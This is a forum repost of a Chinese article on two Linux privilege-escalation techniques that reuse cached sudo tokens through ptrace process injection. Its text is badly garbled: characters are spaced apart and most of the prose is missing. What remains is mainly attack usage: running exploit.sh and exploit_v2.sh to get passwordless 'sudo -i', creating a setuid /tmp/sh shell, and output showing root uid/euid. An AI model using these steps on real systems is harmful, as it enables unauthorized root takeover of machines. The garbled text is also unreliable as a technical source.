[18101] 2020-07-25_两种利用sudotoken实现提权的技巧

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-07-25_两种利用sudotoken实现提权的技巧 s u d o   t o k e n A l p h a _ h 4 c k   H A C K   2 0 2 0 - 0 7 - 2 5 s u d o r o o t s u d o / v a r / r u n / s u d o / t s / [ u s e r n a m e ] L i n u x s u d o 使 1   P t r a c e / p r o c / s y s / k e r n e l / y a m a / p t r a c e _ s c o p e   = =   0 2   s u d o u i d 1 5 1 5 使 s u d o s u d o E x p l o i t . s h S h e l l 使 s u d o s u d o S h e l l 使 使 R C E 使 s u d o s u d o 1   s u d o s u d o   l s 2   使 使 e x p l o i t _ v 2 . s h / t m p / s h s u i d   s h e x p l o i t _ v 1 e x p l o i t _ v 2 . s h $ s u d o   w h a t e v e r   [ s u d o ] p a s s w o r d   f o r   u s e r :         #   P r e s s < c t r l > + c   s i n c e   y o u   d o n ' t   h a v e   t h e   p a s s w o r d .   #   T h i s   c r e a t e s   a n   i n v a l i d s u d o   t o k e n s . $   s h   e x p l o i t . s h . . . . w a i t   1   s e c o n d s $ s u d o   - i   #   n o   p a s s w o r d   r e q u i r e d #   i d u i d = 0 ( r o o t ) g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) # e c h o   0   >   / p r o c / s y s / k e r n e l / y a m a / p t r a c e _ s c o p e #   # D o n ' t   w o r r y   t h i s   i s   n o t   p e r s i s t e n t   a c c r o s s   r e b o o t
h t t p s : / / w w w . r e d h a t . c o m / a r c h i v e s / a x p - l i s t / 2 0 0 1 - J a n u a r y / m s g 0 0 3 5 5 . h t m l h t t p s : / / w w w . s u d o . w s / m a n / 1 . 8 . 2 5 / s u d o e r s _ t i m e s t a m p . m a n . h t m l h t t p s : / / b l o g . g d s s e c u r i t y . c o m / l a b s / 2 0 1 7 / 9 / 5 / l i n u x - b a s e d - i n t e r - p r o c e s s - c o d e - i n j e c t i o n - w i t h o u t - p t r a c e 2 . h t m l h t t p s : / / b l o g . h a b e t s . s e / 2 0 0 9 / 0 3 / M o v i n g - a - p r o c e s s - t o - a n o t h e r - t e r m i n a l . h t m l h t t p s : / / w w w . l i n u s a k e s s o n . n e t / p r o g r a m m i n g / t t y / A l p h a _ h 4 c k $ . / e x p l o i t _ v 2 . s h C u r r e n t p r o c e s s   :   2 4 4 1 c h m o d : c h a n g i n g   p e r m i s s i o n s   o f   ' a c t i v a t e _ s u d o _ t o k e n ' :   O p e r a t i o n   n o t   p e r m i t t e d I n j e c t i n g p r o c e s s   1 7 2 1   - >   b a s h I n j e c t i n g p r o c e s s   2 4 3 3   - >   b a s h c a t : / p r o c / 2 4 4 6 / c o m m :   N o   s u c h   f i l e   o r   d i r e c t o r y I n j e c t i n g p r o c e s s   2 4 4 6   - > $ / t m p / s h   - p #   i d u i d = 1 0 0 1 ( t e s t ) g i d = 1 0 0 1 ( t e s t )   e u i d = 0 ( r o o t )   e g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) , 1 0 0 1 ( t e s t )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则